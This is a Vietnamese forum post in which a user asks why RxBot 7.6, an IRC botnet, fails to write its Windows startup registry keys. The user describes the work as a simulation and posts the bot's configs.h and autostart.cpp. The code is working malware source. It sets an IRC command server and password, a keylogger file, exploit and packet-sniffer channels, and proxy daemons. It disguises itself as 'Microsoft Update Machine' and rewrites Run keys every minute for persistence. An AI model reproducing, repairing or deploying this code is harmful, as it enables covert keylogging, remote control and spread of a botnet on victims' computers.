Công cụ bảo vệ mã nguồn .NET mạnh nhất, không thể unpack, miễn phí cho các khách hàng đầu tiên đăng ký.
Từ 1 tới 2 trên tổng số 2 kết quả

Đề tài: [RxBot] Không thêm khóa vào registry đc

Threaded View

 1. #1
  Ngày gia nhập
  02 2011
  Bài viết
  1

  Mặc định [RxBot] Không thêm khóa vào registry đc

  Mình đang xây dựng 1 mô phỏng, có sử dụng con bot rxbot để thả vào máy mô phỏng, mình dùng source bản 7.6, đã chạy được nhưng có 1 cái là nó không thêm khóa registry để tự động khởi động cùng windows được, mình không rõ là tại sao :'( mong các[COD] bạn chỉ giáo
  mình nghĩ nó chỉ có vấn đề ở thư viện configs.h và hàm autostart thôi, sau đây là đoạnc code của 2 cái này, ngoài ra mình có đính kèm source code nếu các bạn muốn xem thêm.
  Hy vọng được các bro chỉ giáo sớm :((
  configs.h
  Code:
  // bot configuration (Lsass by Uncanny) 
  int port = 6667;				// server port
  int port2 = 6667;				// backup server port
  int socks4port = 38;			// Port # for sock4 daemon to run on - CHANGE THIS!!!
  int tftpport = 69;				// Port # for tftp daemon to run on
  int httpport = 81;			// Port # for http daemon to run on
  int rloginport = 37;			// Port # for rlogin daemon to run on
  BOOL topiccmd = TRUE;			// set to TRUE to enable topic commands
  BOOL rndfilename = TRUE;		// use random file name
  BOOL AutoStart = TRUE;			// enable autostart registry keys
  char prefix = '.';				// command prefix (one character max.)
  int maxrand = 6;				// how many random numbers in the nick
  int nicktype = CONSTNICK;		// nick type (see rndnick.h)
  BOOL nickprefix = TRUE;			// nick uptime & mirc prefix
  
  #ifdef DEBUG_LOGGING
  char logfile[]="c:\\debug.txt";
  #endif
  
  #ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!
  
  #else // Recommended to use this only for Crypt() setup, this is unsecure.
  
  char botid[] = "Bot";						// bot id
  char version[] = "[RxBot v7.6 modded by Tr0gd0r]";		// Bots !version reply
  char password[] = "1234";					// bot password
  char server[] = "aenigma.gotd.org";		// server
  char serverpass[] = "1234";						// server password
  char channel[] = "#bot1";				// channel that the bot should join
  char chanpass[] = "1234";						// channel password
  char server2[] = "";						// backup server (optional)
  char channel2[] = "";						// backup channel (optional)
  char chanpass2[] = "";						// backup channel password (optional)
  char filename[] = "winmgr.exe";			// destination file name
  char keylogfile[] = "system.txt";				// keylog filename
  char valuename[] = "Microsoft Update Machine";		// value name for autostart
  char nickconst[] = "n-";					// first part to the bot's nick
  char szLocalPayloadFile[]="msconfig.dat";	// Payload filename
  char modeonconn[] = "-x+B";					// Can be more than one mode and contain both + and -
  char exploitchan[] = "#bot1";					// Channel where exploit messages get redirected
  char keylogchan[] = "#bot1"; 					// Channel where keylog messages get redirected
  char psniffchan[] = "#n";						// Channel where psniff messages get redirected 
  
  char *authost[] = {
  	"*@*",
  };
  
  char *versionlist[] = {
  	"mIRC v6.03 Khaled Mardam-Bey",
  	"mIRC v6.10 Khaled Mardam-Bey",
  	"mIRC v6.12 Khaled Mardam-Bey",
  	"mIRC v6.14 Khaled Mardam-Bey"
  };
  
  char regkey1[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
  char regkey2[]="Software\\Microsoft\\Windows\\CurrentVersion\\RunServices";
  char regkey3[]="Software\\Microsoft\\OLE";
  char regkey4[]="SYSTEM\\CurrentControlSet\\Control\\Lsa";
  
  #endif
  autostart.cpp
  Code:
  #include "includes.h"
  #include "functions.h"
  #include "externs.h"
  
  // globals
  #ifndef NO_REGISTRY
  int registry_delay=60000;
  #endif
  
  AUTOSTART autostart[]={
  	{HKEY_LOCAL_MACHINE,(LPCTSTR)regkey1},
  	{HKEY_LOCAL_MACHINE,(LPCTSTR)regkey2},
  	{HKEY_CURRENT_USER,(LPCTSTR)regkey1}
  };
  
  void AutoStartRegs(char *nfilename)
  {
  	HKEY key;
  
  	for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
  		fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
  		if (nfilename)
  			fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
  		else
  			fRegDeleteValue(key, valuename); 
  		fRegCloseKey(key); 
  	}
    
  	return;
  }
  
  #ifndef NO_REGISTRY
  DWORD WINAPI AutoRegistry(LPVOID param)
  {
  	char *nfilename = (char *)param;
  
  	while (1) {
  		AutoStartRegs(nfilename);
  		Sleep(registry_delay);
  	}
  	return 0;
  }
  #endif
  Attached Files Attached Files

Các đề tài tương tự

 1. Cách Build Botnet/Virus Rxbot in VC++6.0 như thế nào?
  Gửi bởi hoangc5 trong diễn đàn Lập trình Virus & Anti-Virus
  Trả lời: 8
  Bài viết cuối: 29-03-2013, 04:37 PM
 2. Registry CleanUP 5 Suite 5.0.1.0(dọn dẹp registry để máy chạy nhanh hơn)
  Gửi bởi gioyeumay123 trong diễn đàn Software (Phần mềm) | Ebooks
  Trả lời: 0
  Bài viết cuối: 03-04-2012, 04:18 PM
 3. Thêm thuộc tính làm khóa chính trong thực thể
  Gửi bởi Sess_Kakashi trong diễn đàn Thắc mắc Microsoft SQL Server & Microsoft Access
  Trả lời: 0
  Bài viết cuối: 28-10-2011, 12:54 PM
 4. Database Báo lỗi Khóa Ngoại Khi Thêm CSDL Vào DataGridView
  Gửi bởi gait trong diễn đàn Thắc mắc lập trình C#
  Trả lời: 2
  Bài viết cuối: 20-04-2011, 12:14 AM
 5. học thêm 1 khóa lập trình .net ở đâu là tốt nhất (TP HCM) ?
  Gửi bởi Hianalyst trong diễn đàn Đào tạo CNTT
  Trả lời: 2
  Bài viết cuối: 16-08-2010, 12:57 PM

Quyền hạn của bạn

 • Bạn không thể gửi đề tài mới
 • Bạn không thể gửi bài trả lời
 • Bạn không thể gửi các đính kèm
 • Bạn không thể chỉnh sửa bài viết của bạn